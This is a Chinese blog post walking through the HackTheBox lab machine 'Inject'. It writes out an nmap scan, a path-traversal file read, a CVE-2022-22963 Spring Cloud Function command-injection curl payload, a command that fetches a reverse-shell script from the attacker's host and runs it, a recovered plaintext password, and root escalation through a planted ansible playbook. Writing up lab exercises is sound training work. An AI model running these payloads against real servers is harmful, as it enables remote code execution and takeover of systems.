HTB打靶日记:Inject

最新推荐文章于 2024-08-02 16:22:25 发布
最新推荐文章于 2024-08-02 16:22:25 发布
阅读量2.1k 收藏 6
点赞数 6
文章标签: 网络 linux 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73998094/article/details/129474782
版权

信息收集

TCP协议:

nmap -p- -sT --min-rate=1000 -Pn 10.129.226.252

UDP协议:

nmap -p- -sU --min-rate=1000 -Pn 10.129.226.252

nmap -p22,8080 -sC -sV -O -sT 10.129.226.252

 访问8080端口,发现web页面,在页面上发现了upload按钮,点击后发现跳转到了/upload目录

 尝试随便上传一个图片,页面给出了图片的路径,看到?img=2.png,此时立刻想到了LFI漏洞

 替换2.png,成功包含/etc/passwd文件

 但是当我尝试去掉passwd时,发现它可以将/etc/目录下的所有文件显示出来,这代表我们不用进行枚举目录了

 翻看目录,在/var/www/WebApp/pom.xml中发现了spring-cloud-function

curl "http://10.129.226.252:8080/show_image?img=../../../../../../../var/www/WebApp/pom.xml"

spring-cloud-function存在一个新爆出的漏洞CVE-2022-22963

利用漏洞成功rce

curl -X POST  http://10.129.226.252:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned" )' --data-raw 'data' -v
curl http://10.129.226.252:8080/show_image?img=../../../../../../tmp

 远程加载反弹shell脚本

curl -X POST  http://10.129.226.252:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.14.17/wen.sh -o /tmp/wen.sh")' --data-raw 'data' -v

 

 利用nc监听,成功获取初始权限

curl -X POST  http://10.129.226.252:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash  /tmp/wen.sh")' --data-raw 'data' -v

 查找当前用户权限对应的文件

find / -group frank -type f 2>/dev/null | grep -v "proc"

在/home/frank/.m2/settings.xml中发现了phil的用户密码

 

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

利用pspy监控进程,发现了root权限正在运行ansible-parallel

2023/03/12 04:36:02 CMD: UID=0    PID=27905  | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml 
2023/03/12 04:36:05 CMD: UID=0    PID=27915  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml 
2023/03/12 04:36:05 CMD: UID=0    PID=27909  | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml

 去/opt/automation/tasks目录下查看一下playbook_1.yml的格式

 创建playbook_2.yml,远程加载到/opt/automation/tasks目录下,很快获取了root权限

 在/home/phil目录下找到了user.txt

 在/root目录下发现了root.txt

 

文(备考oscp版~)
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
htb inject
qq_58869808的博客
03-13 3020
hackthebox inject 靶机
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
HTB-Inject
TA不懒,但还没有添加简介
03-27 671
HTB-Inject
htb_Inject (LFI,Spring Cloud Function SpEL注入)
weixin_62621015的博客
03-25 466
Inject hack the box靶场
HTBInject——冲出新手村第一关 目录爆破,文件包含,CVE-2022-22965,CVE-2022-22963,信息收集,pspy,SUID提权,组权限利用
m0_62783065的博客
04-04 430
目录爆破,文件包含,CVE-2022-22965,CVE-2022-22963,信息收集,SUID提权,组权限利用。
HTB_Markup_xml注入读ssh私钥&进程注入
网络安全学习
01-31 485
HTB_Markup_xml注入读ssh私钥&进程注入
HTB打靶日记:Soccer
m0_73998094的博客
12-29 1243
HTB打靶日记:Soccer
HTB打靶日记:Brainfuck
m0_73998094的博客
12-25 795
HTB打靶日记:Brainfuck
HTB打靶日记:Sense
m0_73998094的博客
12-29 633
HTB打靶日记:Sense
HTB打靶日记:Investigation
01-27
hackthebox
HTB打靶日记:Mentor
01-11
hackthebox
HTB打靶日记:BroScience
01-10
在本文中,我们将深入探讨一个名为“BroScience”的HackTheBox靶场机器的渗透测试过程。这个场景主要涉及Web安全Linux系统以及多种攻击技术。首先,我们从信息收集开始,使用Nmap对目标IP(10.129.125.159)进行...
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
【中项】系统集成项目管理工程师-第8章 信息安全工程-8.2信息安全系统
m0_66540684的博客
07-30 1095
信息安全保障系统一般简称为信息安全系统,它是“信息系统”的一个部分,用于保证“业务应用信息系统”正常运营。现在人们己经明确,要建立一个“信息系统”,就必须要建立一个或多个业务应用信息系统和一个信息安全系统。信息安全系统是客观的、独立于业务应用信息系统而存在的信息系统。
Linux防火墙2
YCyjs的博客
07-31 1300
SNAT 应用环境局域网主机共享单个公网IP地址接入Internet (私有IP不能在Internet中正常路由),私转公SNAT原理:源地址转换,根据指定条件,通常被叫做SNAT转换前提条件:1.局域网各主机已正确设置IP地址、子网掩码、默认网关地址2.Linux网关开启IP路由转发。
TCP请求如何获取客户端真实源IP地址
ajax_beijing_java的博客
07-29 551
针对四层的TCP请求(TCP监听器),可以通过在后端主机配置TOA插件获取客户端的真实源IP地址。TOA是操作系统的内核模块,需要在ELB后端主机中安装TOA插件,以实现后端主机可获取客户端真实源IP地址的目的。c. 编译过程若未提示warning或者error,说明编译成功,检查当前目录下是否已经生成toa.ko文件。假如提示信息中包含“TOA: toa loaded”,则证明内核模块已经加载成功。f. 以下步骤是以Ubuntu、Debian环境为例,进行编译环境准备。主备、集群模式资源池列表见。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
最新发布
Lusen的博客
08-02 309
Vulnhub系列Connect-The-Dots靶场做题记录
FastDDS中的线程梳理
u010378559的博客
07-29 469
Fast DDS中的线程梳理和代码分析,详解
网络安全在2024好入行吗?
2401_84466225的博客
07-29 636
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值